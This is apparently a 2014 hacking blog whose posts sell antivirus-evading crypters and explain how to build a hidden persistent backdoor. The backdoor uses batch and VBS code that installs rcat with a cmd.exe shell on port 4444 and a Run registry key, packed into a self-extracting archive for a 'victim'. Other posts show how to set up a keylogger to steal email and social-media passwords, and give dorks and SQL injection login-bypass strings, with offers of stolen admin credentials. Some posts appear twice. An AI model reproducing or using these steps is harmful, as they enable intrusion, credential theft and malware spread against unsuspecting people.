Madleetshackers
Thursday, 17 July 2014
Fud crypter......100% working
Crypters can pack your file in a way that the actual bytes are not readable. People use a crypter to to protect a file that they release, from crackers and reverse engineering. Or make files that are detected for some reason fully undetectable (FUD). False positives can be defeated this way and your file will get protected with a polymorphic and strong encryption.Crypting is easy and can be done by anyone. The crypter that we offer is made for simplicity and easy usage. You can Crypt with just one click on a button without having to think about the hard processes behind it. Anyone can use our product, from beginners to advanced users! Our software is your formul for a long lasting undetection.
The crypted files should not be scanned on services which distribute samples like VirusTotal, Jotti .... Only use SightScanner you can download with the crypter, to ensure the file stays FUD for a longer period of time. Uploading crypted files to Dropbox and other similar services is also not allowed. Only use direct links provided by your hosting provider.
1).Hidden sight crypter
virus scan
File Output after crypting with hidden sight crypter
Report date: July,15, 2014
scan Occured: 7 minutes ago
File name: crypted-
File size: 35126
MD5 Hash:
41b1975174ee207d3fd87c07e9b8210e
SHA1 Hash:
c771a900a8b1d480a56ea1303ff2623caf30b0f8
Detection rate: 0 out of 37
Total Result: 0/37
Detections:
AVG -
Acavir -
Avast 5 -
Avast -
Avira -
BitDefender -
VirusBuster Internet Security -
Clam Antivirus -
COMODO Internet Security -
DrWeb -
ETrust-
F-
G Data -
IKARUS Security-
Kaspersky Antivirus -
McAfee -
MS Security Essentials -
ESET NOD32 -
Norman -
Norton -
Panda Security -
A-
Quick Heal Antivirus -
Rising Antivirus -
Solo Antivirus -
Sophos -
Trend Micro Internet Security -
VBA32 Antivirus -
Vexira Antivirus -
Webroot Internet Security -
Ad-
Zoner AntiVirus -
AhnLab V3 Internet Security -
BullGuard -
Imunitet -
Vipre -
Download Here and enjoy
2).Heaven crypter
Virus scan
Emisoft AntiMalware (A-Squared) OK
ArcaVir OK
Avast OK
Avg OK
Avira OK
Ad-Aware OK
BitDefender OK
BullGuard Internet Security OK
ClamAv OK
Comodo OK
Total Defense IS OK
Dr. Web OK
eScan Internet Security Suite 14 OK
Fortinet 5 OK
Fprot OK
F-Secure OK
Gdata OK
Ikarus OK
Immunet Antivirus OK
K7Ultimate OK
Kaspersky Internet Security 2014 OK
McAfee Total Protection 2013 OK
Nano OK
Norton Internet Security OK
ESET Nod32 v7 OK
Norman OK
Outpost Security Suite Pro OK
Panda Antivirus OK
Panda Cloud OK
Quick Heal OK
SUPERAntiSpyware OK
Microsoft Security Essentials OK
Sophos OK
TrendMicro OK
Twister Antivirus 8 OK
Vba OK
Vipre Internet Security 2013 OK
Virit OK
Download Here
-
Thanks
Wednesday, 16 July 2014
How to Bypass with FUD technique-Bypass an Antivirus
How to bypass an Antivirus or how to create a FUD(Fully undetectable),the need to bypass an antivirus is very high because it is very helpful.
To do this we use a simple technique:
1)Create a batch file ,vbs file that will add your Rcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.
a)Open a notepad and than save it to name.bat
b)Open another notepad then save it to name.vbs
2).Download rcat here and then copy rcat.exe into the same directory where name.bat and name.vbs exist,)...Now we use winrar to combine these three files, select three and then right click on add to archive.....On the next window mark check on create SFX archive
Go to advance tab and click on SFX option.
Fill out the options like at the figure below...
Change the tab to modes and place mark of hide all....
Almost done click OK than OK to create an exe file.New file must be appear at the same directory and
New file has an ability to bypass the most famous antivirus software and it has contained our back door. Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.
There are some crypter, wrapper and other tools available on the Internet, it is not highly recommended to download any file from an unknown source because some people usually use these techniques to make an innocent person look like a fool. So when you download and install such a file there is a chance that your computer will be affected by some sort of malware and backdoor(s).
So last but not least, never trust any unknown source. Otherwise you will be the next victim, whether you have antivirus or not. And now you have seen how easy is it is to bypass an antivirus........
Enjoy....
If u have any problem....then pm me .i will help u...Thanks
To do this we use a simple technique:
1)Create a batch file ,vbs file that will add your Rcat into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.
@echo off copy rcat.exe %systemroot%\system32\rcat.exe if errorlevel 0 goto regedit goto error :regedit reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\name.vbs" if errorlevel 0 goto ip :error echo something wrong with the program. goto end :ip echo write down the IP address from the table ipconfig :end echo end. rcat.exe -l -p 4444 -e cmd.exe -L(We add a registry key because it auto runs the rcat at start up)
a)Open a notepad and than save it to name.bat
Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "C:\WINDOWS\system32\name.bat" & Chr(34), 0 Set WshShell = Nothing(In order to hide the running rcat we use vb script ).
b)Open another notepad then save it to name.vbs
2).Download rcat here and then copy rcat.exe into the same directory where name.bat and name.vbs exist,)...Now we use winrar to combine these three files, select three and then right click on add to archive.....On the next window mark check on create SFX archive
Go to advance tab and click on SFX option.
Fill out the options like at the figure below...
Change the tab to modes and place mark of hide all....
Almost done click OK than OK to create an exe file.New file must be appear at the same directory and
New file has an ability to bypass the most famous antivirus software and it has contained our back door. Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.
There are some crypter, wrapper and other tools available on the Internet, it is not highly recommended to download any file from an unknown source because some people usually use these techniques to make an innocent person look like a fool. So when you download and install such a file there is a chance that your computer will be affected by some sort of malware and backdoor(s).
So last but not least, never trust any unknown source. Otherwise you will be the next victim, whether you have antivirus or not. And now you have seen how easy is it is to bypass an antivirus........
Enjoy....
If u have any problem....then pm me .i will help u...Thanks
Monday, 14 July 2014
Hack Gmail, Facebook,Yahoo.....
Hack Gmail, Facebook,Yahoo with Ardamax Keylogger(Free and full version)
Today i am going to show you how to hack gmail, facebook, Yahoo! Passwords using ardamax keylogger. If you are new to keyloggers, please refer my previous articles on keyloggers for better understanding.
Procedure to hack.
Step 1) First download Ardamax keylogger from here Extract the keylogger from RAR into your desired folder and open it.
Step 2) After installing....
Copy all PATCH content to Where u install Aradamax keylogger (For example
C:/Programfile/sus etc)....download patch here
Step 3) Now right click the icon and select “remote installation”. Click next by checking all the boxes until you see the following window and then follow the following pictures.
Step 4) Once you are done with the above, you will see the following window. Selecting delivery method via FTP is the better option, but in this tutorial i am going with email delivery method.Now fill the email options as mentioned here.
Send to- your email id
Send from- your email id
Smtp host –smtp.gmail.com
And finally your username and password. You can test whether it is working or not by clicking the test button. And finally click next to proceed.
Finally you will see the following window, if you have done everything correctly.
Now send the created server file to your victim. It logs all his keystrokes and sends them to you via email.
Note: The server file you have created will be detected as a virus by your antivirus. I will write few articles on bypassing antivirus detection in my upcoming posts.
Hope you enjoyed this article, feel free to leave your comments for further doubts and clarifications.
Sunday, 13 July 2014
Website Hacking
HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION
You may have seen that hackers hack the websites and then make the changes according to them.You must have questioned yourself like Can i do the same? Can i be able to a website?
In this tutorial i will show you how to hack a website using SQL (Structured Query Language ) injection.
Lets start.
Definition of SQL injection?
It is a technique often used to attack databases through a website.
If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway.
Step 1: Finding Vulnerable website
Google is the best partner for your SQL injection.We can find the vulnerable websites using goggle dork list.
Open google and below a list of best google dorks are given,you can type any of them in google search box.
Google dorks:-
“inurl:adminlogin.aspx”
“inurl:admin/index.php”
“inurl:administrator.php”
“inurl:administrator.asp”
“inurl:login.asp”
“inurl:adminlogin.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
For username we always type “Admin” and for password we use sql injection.
Here is the list of some common Sql injection-:
User: 1'or'1'='1
Password: 1'or'1'='1
Here is the list of some common Sql injection-:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”) Type any of these in Password box. It will look like this:-
username:Admin
password:’”a”=”a”
Disclaimer - This post is only for teaching purpose. Any illegal use of this will not be entertained and website owner is not responsible for any kind of illegal activity through it.
Some websites which I got(with pass):
Download websites link(admin pass) and enjoy
You may have seen that hackers hack the websites and then make the changes according to them.You must have questioned yourself like Can i do the same? Can i be able to a website?
In this tutorial i will show you how to hack a website using SQL (Structured Query Language ) injection.
Lets start.
Definition of SQL injection?
It is a technique often used to attack databases through a website.
If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway.
Step 1: Finding Vulnerable website
Google is the best partner for your SQL injection.We can find the vulnerable websites using goggle dork list.
Open google and below a list of best google dorks are given,you can type any of them in google search box.
Google dorks:-
“inurl:adminlogin.aspx”
“inurl:admin/index.php”
“inurl:administrator.php”
“inurl:administrator.asp”
“inurl:login.asp”
“inurl:adminlogin.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
For username we always type “Admin” and for password we use sql injection.
Here is the list of some common Sql injection-:
User: 1'or'1'='1
Password: 1'or'1'='1
Here is the list of some common Sql injection-:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”) Type any of these in Password box. It will look like this:-
username:Admin
password:’”a”=”a”
Disclaimer - This post is only for teaching purpose. Any illegal use of this will not be entertained and website owner is not responsible for any kind of illegal activity through it.
Some websites which I got(with pass):
Download websites link(admin pass) and enjoy
Subscribe to:
Comments (Atom)












